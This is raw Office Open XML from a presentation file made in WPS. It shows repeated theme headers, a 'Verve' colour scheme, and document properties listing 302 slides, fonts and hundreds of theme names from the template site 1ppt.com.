<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="53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55.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="54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56.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="55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57.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="56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58.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="57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59.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="58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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="5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60.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="59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61.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="60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62.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="61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63.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="62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64.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="63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65.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="64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66.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="65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67.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="66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68.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="67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69.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="68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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="6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70.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="69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71.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="70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72.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="71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73.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="72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74.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="73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75.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="74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76.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="75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77.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="76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78.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="77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79.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="78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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="7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80.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="79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81.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="80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82.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="81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83.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="82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84.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="83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85.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="84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86.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="85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87.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="86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88.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="87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89.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="88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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="8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90.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="89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91.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="90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92.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="91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93.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="92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94.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="93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95.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="94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96.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="95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97.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="96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98.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="97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99.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="98_第一PPT，www.1ppt.com">
  <a:themeElements>
    <a:clrScheme name="Verve">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="666666"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D2D2D2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FF388C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E40059"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="9C007F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="68007F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="005BD3"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="00349E"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="17BBFD"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FF79C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0</TotalTime>
  <Words>40435</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>3922</Paragraphs>
  <Slides>302</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>286</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>302</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="606" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Segoe UI Semilight</vt:lpstr>
      <vt:lpstr>LilyUPC</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Microsoft Sans Serif</vt:lpstr>
      <vt:lpstr>第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>1_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>2_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>3_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>4_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>5_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>6_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>7_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>8_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>9_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>10_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>11_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>12_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>13_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>14_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>15_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>16_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>17_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>18_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>19_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>20_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>21_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>22_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>23_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>24_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>25_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>26_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>27_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>28_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>29_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>30_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>31_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>32_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>33_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>34_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>35_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>36_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>37_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>38_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>39_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>40_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>41_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>42_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>43_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>44_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>45_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>46_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>47_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>48_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>49_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>50_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>51_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>52_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>53_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>54_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>55_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>56_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>57_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>58_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>59_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>60_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>61_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>62_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>63_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>64_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>65_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>66_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>67_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>68_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>69_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>70_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>71_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>72_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>73_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>74_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>75_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>76_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>77_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>78_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>79_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>80_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>81_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>82_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>83_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>84_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>85_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>86_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>87_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>88_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>89_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>90_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>91_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>92_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>93_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>94_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>95_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>96_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>97_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>98_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>99_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>100_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>101_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>102_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>103_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>104_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>105_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>106_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>107_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>108_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>109_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>110_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>111_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>112_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>113_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>114_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>115_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>116_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>117_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>118_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>119_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>120_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>121_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>122_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>123_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>124_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>125_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>126_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>127_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>128_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>129_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>130_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>131_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>132_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>133_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>134_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>135_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>136_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>137_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>138_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>139_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>140_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>141_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>142_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>143_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>144_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>145_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>146_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>147_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>148_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>149_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>150_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>151_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>152_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>153_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>154_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>155_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>156_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>157_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>158_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>159_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>160_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>161_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>162_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>163_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>164_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>165_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>166_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>167_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>168_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>169_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>170_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>171_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>172_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>173_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>174_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>175_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>176_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>177_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>178_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>179_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>180_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>181_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>182_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>183_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>184_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>185_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>186_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>187_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>188_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>189_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>190_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>191_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>192_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>193_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>194_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>195_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>196_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>197_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>198_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>199_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>200_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>201_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>202_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>203_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>204_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>205_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>206_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>207_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>208_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>209_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>210_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>211_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>212_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>213_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>214_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>215_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>216_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>217_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>218_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>219_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>220_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>221_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>222_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>223_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>224_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>225_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>226_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>227_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>228_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>229_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>230_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>231_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>232_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>233_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>234_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>235_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>236_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>237_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>238_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>239_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>240_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>241_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>242_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>243_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>244_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>245_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>246_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>247_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>248_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>249_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>250_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>251_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>252_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>253_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>254_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>255_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>256_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>257_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>258_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>259_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>260_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>261_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>262_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>263_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>264_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>265_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>266_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>267_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>268_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>269_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>270_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>271_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>272_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>273_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>274_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>275_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>276_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>277_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>278_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>279_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>280_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>281_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>282_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>283_第一PPT，www.1ppt.com</vt:lpstr>
